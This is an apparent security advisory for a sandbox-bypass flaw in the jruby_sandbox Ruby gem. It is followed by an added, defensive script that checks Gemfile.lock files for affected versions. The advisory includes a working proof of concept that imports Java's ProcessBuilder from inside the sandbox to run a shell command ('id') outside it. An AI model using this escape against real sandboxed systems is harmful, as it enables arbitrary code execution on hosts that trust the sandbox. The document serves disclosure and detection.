Arbitrary Code Execution Affecting jruby_sandbox package, versions < 0.2.3


0.0
high

Snyk CVSS

    Attack Complexity High
    Confidentiality High

  • Snyk ID SNYK-RUBY-JRUBYSANDBOX-20156
  • published 23 Apr 2014
  • disclosed 23 Apr 2014
  • credit joernchen

Introduced: 23 Apr 2014

CVE NOT AVAILABLE CWE-94

Overview

jruby_sandbox is a version of _why's Freaky Freaky Sandbox for JRuby. Affected versions of this gem are vulnerable to a sandbox bypass that allows arbitrary code execution through the import of Java classes.

Details

jruby_sandbox aims to allow safe execution of user-given Ruby code within a JRuby [0] runtime. However, via the import of Java classes, it is possible to circumvent those protections and execute arbitrary code outside the sandboxed environment.

Example:

require 'sandbox'
sand = Sandbox.safe
sand.activate!

# The plain-Ruby attempt is rejected inside the sandbox.
begin
  sand.eval("print id")
rescue Exception => e
  puts "fail via Ruby ;)"
end
puts "Now for some Java"

# Java classes imported via Kernel.send :java_import are not restricted.
sand.eval("Kernel.send :java_import, 'java.lang.ProcessBuilder'")
sand.eval("Kernel.send :java_import, 'java.util.Scanner'")
sand.eval("s = Java::java.util.Scanner.new( " +
  "Java::java.lang.ProcessBuilder.new('sh','-c','id')" +
  ".start.getInputStream ).useDelimiter(\"\\x00\").next")
sand.eval("print s")
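
To check whether a project locks an affected release, the following added example (not part of the advisory or of the jruby_sandbox project) scans Gemfile.lock text for jruby_sandbox versions below 0.2.3. The helper names and the sample lockfile are constructed for illustration.

```ruby
require 'rubygems' # provides Gem::Version

GEM_NAME      = 'jruby_sandbox'
FIXED_VERSION = Gem::Version.new('0.2.3') # from the advisory: versions < 0.2.3

# Constructed sample lockfile, for illustration only.
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      jruby_sandbox (0.2.2-java)
      rake (10.3.1)

  PLATFORMS
    java

  DEPENDENCIES
    jruby_sandbox (~> 0.2)
LOCK

# Versions of gem_name resolved in Gemfile.lock text. Resolved gems sit
# under "specs:" with exactly four spaces of indentation; dependency
# constraints (six spaces, or the DEPENDENCIES section) are ignored.
def locked_versions(lockfile_text, gem_name = GEM_NAME)
  pattern = /^ {4}#{Regexp.escape(gem_name)} \(([^)\s]+)\)[ \t\r]*$/
  lockfile_text.scan(pattern).flatten.map do |raw|
    # Drop a platform suffix such as "-java": Gem::Version would otherwise
    # read "0.2.3-java" as a prerelease that sorts below 0.2.3.
    Gem::Version.new(raw.split('-', 2).first)
  end
end

# Locked versions that fall in the affected range (< 0.2.3).
def affected_versions(lockfile_text)
  locked_versions(lockfile_text).select { |v| v < FIXED_VERSION }
end

if __FILE__ == $PROGRAM_NAME
  text = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_LOCK
  hits = affected_versions(text)
  if hits.empty?
    puts "no affected #{GEM_NAME} version locked"
  else
    puts "affected: #{GEM_NAME} #{hits.join(', ')} (fixed in #{FIXED_VERSION})"
  end
end
```

Run it with the path to a Gemfile.lock as the first argument; without an argument it checks the constructed sample.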